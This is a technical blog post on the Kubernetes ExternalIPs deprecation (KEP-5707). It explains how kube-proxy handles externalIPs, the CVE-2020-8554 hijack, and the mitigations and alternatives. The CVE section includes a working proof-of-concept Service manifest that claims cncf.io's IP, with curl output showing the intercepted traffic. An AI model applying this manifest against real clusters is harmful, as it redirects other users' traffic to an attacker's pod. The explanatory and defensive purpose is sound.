
ExternalIPs Deprecated? From Design to Vulnerability to KEP-5707

ChengHao Yang
SRE / CNCF Ambassador

ExternalIPs has been part of the Kubernetes Service API since v1.0. After 11 years, SIG Network has decided to deprecate it starting from v1.36, with plans to lock the feature from v1.43. What happened?

Let’s walk through “KEP-5707: Deprecate Service.spec.externalIPs” together!

Note

This post was written on 2026/4/18 and is based on this commit.

What is ExternalIPs?

Before diving into KEP-5707, let’s understand what the ExternalIPs field does.

When a Service is created, it is assigned a ClusterIP (an internal IP) by default. Traffic to that IP is load-balanced across the Pods matched by the Service's selector.

However, Internal IPs are only accessible within the cluster. How do you handle external traffic coming in? On public cloud Kubernetes, you simply set type: LoadBalancer and let the cloud provider handle the rest. But on private clouds without Cloud Provider support, besides type: NodePort, you’re left to handle routing through your own routers or firewalls.

Moreover, back in 2015 when this was implemented, projects like MetalLB or Cilium didn't exist yet. How would you expose a service on a specific external IP? The answer was to let users specify one "manually".

ExternalIP Service usage diagram

The design of ExternalIPs is straightforward: fill in an IP in the Service’s .spec, and kube-proxy will create iptables / IPVS rules on every node to forward traffic destined for that IP to the corresponding Service endpoints, saving the round trip to external networks.

apiVersion: v1
kind: Pod
metadata:
  name: my-app
  labels:
    app: my-app
spec:
  containers:
    - name: http-echo
      image: hashicorp/http-echo:latest
      args:
        - "-listen=:8080"
        - "-text=hello from my-app"
      ports:
        - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: my-service
spec:
  selector:
    app: my-app
  ports:
    - port: 80
      targetPort: 8080
  externalIPs:
    - 203.0.113.10

In other words, when a node receives a packet destined for 203.0.113.10, kube-proxy will forward the traffic to the backend Pod via iptables rules. Here is the implementation in kube-proxy that creates the forwarding rules for External IPs:

		// Capture externalIPs.
		for _, externalIP := range svcInfo.ExternalIPs() {
			if hasEndpoints {
				// Send traffic bound for external IPs to the "external
				// destinations" chain.
				natRules.Write(
					"-A", string(kubeServicesChain),
					"-m", "comment", "--comment", fmt.Sprintf(`"%s external IP"`, svcPortNameString),
					"-m", protocol, "-p", protocol,
					"-d", externalIP.String(),
					"--dport", strconv.Itoa(svcInfo.Port()),
					"-j", string(externalTrafficChain))
			}
			if !hasExternalEndpoints {
				// Either no endpoints at all (REJECT) or no endpoints for
				// external traffic (DROP anything that didn't get
				// short-circuited by the EXT chain.)
				filterRules.Write(
					"-A", string(kubeExternalServicesChain),
					"-m", "comment", "--comment", externalTrafficFilterComment,
					"-m", protocol, "-p", protocol,
					"-d", externalIP.String(),
					"--dport", strconv.Itoa(svcInfo.Port()),
					"-j", externalTrafficFilterTarget,
				)
			}
		}

Source: Kubernetes v1.35.4 iptables implementation

After deploying the Service above, you can see the iptables rules generated by kube-proxy on the node:

$ docker exec -it externalips-lab-worker iptables -t nat -S | grep "external IP"

-A KUBE-SERVICES -d 203.0.113.10/32 -p tcp -m comment --comment "default/my-service external IP" -m tcp --dport 80 -j KUBE-EXT-FXIYY6OHUSNBITIX

TCP packets destined for 203.0.113.10:80 are directed to the KUBE-EXT-* chain, which ultimately DNATs to the Pod IP.
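You can follow the packet one hop further: the KUBE-EXT-* chain hands off to the Service chain and then to per-endpoint KUBE-SEP-* chains, which hold the actual DNAT rules. (Chain names are hashed per Service, so yours will differ; the node name matches the lab setup above.)

```shell
$ docker exec -it externalips-lab-worker iptables -t nat -S KUBE-EXT-FXIYY6OHUSNBITIX
$ docker exec -it externalips-lab-worker sh -c 'iptables -t nat -S | grep DNAT'
```

The second command lists the DNAT rules that rewrite the destination to a Pod IP.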

However, Kubernetes itself is not responsible for making this IP routable to the node. How the external IP reaches the node is entirely the user’s responsibility.
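For example, on a bare-metal cluster you might publish the IP with a static route on the upstream router, pointing it at one of the nodes (a sketch; 192.168.1.11 is a hypothetical node address):

```shell
# On the upstream router/gateway: send the external IP to a node,
# where kube-proxy's iptables rules take over.
ip route add 203.0.113.10/32 via 192.168.1.11
```

Other common approaches are announcing the IP via ARP or BGP, which is exactly what the alternatives discussed later automate.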

The design seemed reasonable at the time, but a hidden danger was lurking — CVE-2020-8554.

CVE-2020-8554

  • 2019/12/27 champtar reported the issue
  • 2020/01/09 Confirmed as a valid vulnerability
  • 2020/03/03 Assigned CVE-2020-8554
  • 2020/12/05 Issue#97076 updated
  • 2020/12/07 PoC details published

Although Kubernetes officially disclosed CVE-2020-8554 on 2020/12/05 in Issue#97076, the issue remains open as of this writing. In other words, the vulnerability still exists in current versions and has never been fixed.

The design scenario described in the previous section assumes that you own the IP you’re assigning. But what if someone sets an IP that doesn’t belong to the infrastructure — say, the CNCF website’s IP? Things get very weird.

In the following example, I create an nginx Pod and a my-evil-service Service, setting the externalIPs to CNCF’s website IP.

This experiment is adapted from a GitHub Issue#97076 comment.

apiVersion: v1
kind: Pod
metadata:
  labels:
    run: nginx
  name: nginx
spec:
  containers:
  - image: nginx:1.29.8-alpine
    name: nginx
    ports:
    - containerPort: 80
      protocol: TCP
---
apiVersion: v1
kind: Service
metadata:
  name: my-evil-service
spec:
  selector:
    run: nginx
  type: LoadBalancer
  ports:
    - name: http
      protocol: TCP
      port: 80
      targetPort: 80
  externalIPs:
    - 23.185.0.3 # cncf.io

As mentioned earlier, Kubernetes does not send ARP responses or BGP announcements for External IPs, and there is absolutely no validation mechanism. kube-proxy simply creates the iptables rules, redirecting internal traffic destined for cncf.io or 23.185.0.3 to my nginx Pod.

Traffic originally intended for the CNCF website gets hijacked by anyone with permission to create a Service.

$ kubectl run --rm -i --tty curl --image=curlimages/curl --restart=Never -- curl -I http://cncf.io
HTTP/1.1 200 OK
Server: nginx/1.29.8
Date: Sat, 18 Apr 2026 10:27:22 GMT
CVE-2020-8554 diagram

How can this be mitigated? There is no patch for this issue, and no upgrade fixes it. The only option is to restrict use of the field through admission control, which led to the k-sigs/externalip-webhook subproject.

Later, starting from v1.21, kube-apiserver ships a built-in DenyServiceExternalIPs admission controller. It is disabled by default, however, and must be enabled explicitly via the --enable-admission-plugins flag.
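On a kubeadm-managed cluster, for example, enabling it means adding the plugin to the kube-apiserver command line (a sketch; the static-pod path is the kubeadm default):

```yaml
# /etc/kubernetes/manifests/kube-apiserver.yaml (excerpt)
spec:
  containers:
    - command:
        - kube-apiserver
        - --enable-admission-plugins=NodeRestriction,DenyServiceExternalIPs
        # ...remaining flags unchanged
```

With the plugin enabled, the API server rejects new Services that set .spec.externalIPs (and updates that add new IPs), while pre-existing Services continue to work.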

If you’re using the Kyverno project, you can use the Restrict External IPs policy.
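A sketch of what that policy looks like (the allowed IP below is illustrative; check the Kyverno policy library for the maintained version):

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-external-ips
spec:
  validationFailureAction: Enforce
  rules:
    - name: check-external-ips
      match:
        any:
          - resources:
              kinds:
                - Service
      validate:
        message: "externalIPs are restricted to an allowed list."
        pattern:
          spec:
            # =() anchor: only validated when externalIPs is present.
            # 203.0.113.10 is an illustrative allowed IP.
            =(externalIPs): "203.0.113.10"
```

Any Service whose externalIPs list contains an address outside the allowed set is rejected (or reported, if the action is set to Audit).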

Alternatives

ARP (Layer 2) or BGP (Layer 3)

There are now many projects that implement ARP and BGP. Notable CNCF projects include MetalLB and Cilium.

Cilium LB IPAM allows you to use the lbipam.cilium.io/ips annotation to specify preferred IPs.

apiVersion: v1
kind: Service
metadata:
  name: service-blue
  annotations:
    "lbipam.cilium.io/ips": "20.0.10.100,20.0.10.200"
spec:
  type: LoadBalancer
  ports:
  - port: 1234

The MetalLB Usage page explains how to use the metallb.io/loadBalancerIPs annotation.

apiVersion: v1
kind: Service
metadata:
  name: nginx
  annotations:
    metallb.io/loadBalancerIPs: 192.168.1.100
spec:
  ports:
  - port: 80
    targetPort: 80
  selector:
    app: nginx
  type: LoadBalancer

The YAML examples above simply show how these annotations can be used to request specific IPs. Detailed configuration is beyond the scope of this post; refer to each project's official documentation.

Gateway API

Each cloud provider and CNCF project has its own implementation, so consult their documentation for details.

If you’re using Cilium Gateway API, you can directly use .spec.addresses to specify IPs.

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: my-gateway
spec:
  gatewayClassName: cilium
  addresses:
    - type: IPAddress
      value: 192.168.1.100
  listeners:
    - name: http
      protocol: HTTP
      port: 80

For cases like Istio, which isn’t directly tied to a CNI, you can use .spec.infrastructure.annotations to pass annotations to the underlying Service, letting MetalLB or Cilium assign the preferred IP.

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
spec:
  gatewayClassName: istio
  infrastructure:
    annotations:
      lbipam.cilium.io/ips: "192.168.1.100"
  listeners:
    - name: http
      protocol: HTTP
      port: 80

Deprecation Timeline

  • v1.36 announces deprecation. kube-proxy adds the AllowServiceExternalIPs feature gate, defaulting to true. Set it to false to disable ExternalIPs.
  • v1.40 onwards: AllowServiceExternalIPs defaults to false.
  • v1.43 onwards: AllowServiceExternalIPs feature gate is locked.
  • v1.46 onwards: all related implementations are removed (AllowServiceExternalIPs feature gate and DenyServiceExternalIPs admission controller).
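Once v1.36 ships, a cluster admin who wants to opt out early could, per the KEP, disable the gate in the kube-proxy configuration (a sketch; the gate name comes from KEP-5707):

```yaml
apiVersion: kubeproxy.config.k8s.io/v1alpha1
kind: KubeProxyConfiguration
featureGates:
  # Per KEP-5707: stop programming rules for Service.spec.externalIPs.
  AllowServiceExternalIPs: false
```

With the gate off, kube-proxy simply ignores the field, so no iptables / IPVS forwarding rules are created for those IPs.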

Afterword

In hindsight, the ExternalIPs design clearly has vulnerabilities. But back in 2015, the Cloud Native ecosystem was just getting started: there was no MetalLB and no Gateway API. On private clouds, if you wanted external traffic to reach your services, your only option besides NodePort was to figure it out yourself. Letting users directly specify an IP was the most intuitive approach at the time.

Tim Hockin, who filed the original proposal, has also acknowledged that .spec.externalIPs was a poor design. However, Kubernetes has always prioritized stability and avoiding breaking changes — even when problems are known, existing fields aren’t removed lightly.

It wasn’t until 2026, with the CNCF ecosystem maturing and viable alternatives in place, that ExternalIPs went from being “the only option” to “a legacy design with security risks” — finally making deprecation feasible.

